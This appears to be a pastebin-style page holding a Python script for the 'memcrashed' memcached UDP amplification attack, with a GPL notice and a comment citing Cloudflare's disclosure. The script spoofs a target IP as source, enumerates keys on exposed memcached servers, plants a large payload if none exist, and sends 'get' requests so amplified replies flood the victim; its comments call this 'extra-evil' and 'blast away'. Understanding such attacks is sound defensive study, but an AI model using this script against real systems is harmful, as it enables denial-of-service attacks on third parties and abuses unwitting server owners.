mem

1.  
2. Save New Duplicate & Edit Just Text Twitter
3. 1
4. 2
5. 3
6. 4
7. 5
8. 6
9. 7
10. 8
11. 9
12. 10
13. 11
14. 12
15. 13
16. 14
17. 15
18. 16
19. 17
20. 18
21. 19
22. 20
23. 21
24. 22
25. 23
26. 24
27. 25
28. 26
29. 27
30. 28
31. 29
32. 30
33. 31
34. 32
35. 33
36. 34
37. 35
38. 36
39. 37
40. 38
41. 39
42. 40
43. 41
44. 42
45. 43
46. 44
47. 45
48. 46
49. 47
50. 48
51. 49
52. 50
53. 51
54. 52
55. 53
56. 54
57. 55
58. 56
59. 57
60. 58
61. 59
62. 60
63. 61
64. 62
65. 63
66. 64
67. 65
68. 66
69. 67
70. 68
71. 69
72. 70
73. 71
74. 72
75. 73
76. 74
77. 75
78. 76
79. 77
80. 78
81. 79
82. 80
83. 81
84. 82
85. 83
86. # This program is distributed in the hope that it will be useful,
87. # but WITHOUT ANY WARRANTY; without even the implied warranty of
88. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
89. # GNU General Public License for more details.
90.  
91. # You should have received a copy of the GNU General Public License
92. # along with this program. If not, see <http://www.gnu.org/licenses/>.
93. #
94. # This was created to better understand the memcrashed exploit
95. # brought to light thanks to CloudFlare.
96. # (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
97. # Please sysadmin responsibly.
98.  
99. # Packets stay blasting
100.  
101. import requests
102. import memcache
103. import re
104.  
105. from scapy.all import *
106.  
107. # Vulnerable memcached server list
108. SERVER_LIST = [
109. '172.17.0.2:11211',
110. ]
111.  
112. # Destination
113. TARGET = '130.211.45.45'
114.  
115. # optional payload to set if no keys exist
116. payload = requests.get('https://google.com').text
117. payload_key = 'fuckit'
118.  
119. # this forces payload to load into memory for being extra-evil and efficient
120. if not payload:
121. print 'Could not import payload, continuing anyway'
122.  
123. try:
124. for server in SERVER_LIST:
125. if ':' in server:
126. server = server.split(':')[0]
127.  
128. ip = IP(src=TARGET, dst=server)
129. packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
130.  
131. # fetch known keys by id
132. statitems_packet = packet_base.format('stats items')
133. udp = UDP(sport=50000, dport=11211)/statitems_packet
134. keyids = []
135. resp = sr1(ip/udp)
136. for key in str(resp.payload).split('\r\n'):
137. # Skip first line which has hex in it (I'm lazy)
138. if 'age' in key:
139. key = key.split(':')[1]
140. keyids.append(key)
141.  
142. # fetch names for keys by id
143. keys = []
144. for kid in keyids:
145. query = 'stats cachedump {0} 100'.format(kid)
146. keyid_packet = packet_base.format(query)
147. udp = UDP(sport=50000, dport=11211)/keyid_packet
148. resp = str(sr1(ip/udp).payload).split('\r\n')
149. for key in resp:
150. if 'ITEM' in key:
151. res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
152. keys.append(res.group('keyname'))
153.  
154. # if keys not present on target, make one
155. if not keys:
156. mc = memcache.Client([server],debug=False)
157. mc.set(payload_key, payload)
158. keys.append(payload_key)
159.  
160. # iterate thru known keys and blast away
161. for key in keys:
162. query = 'get {0}'.format(key)
163. fun_packet = packet_base.format(query)
164. udp = UDP(sport=50000, dport=11211)/fun_packet
165. sr1(ip/udp)
166.  
167. except Exception:
168. raise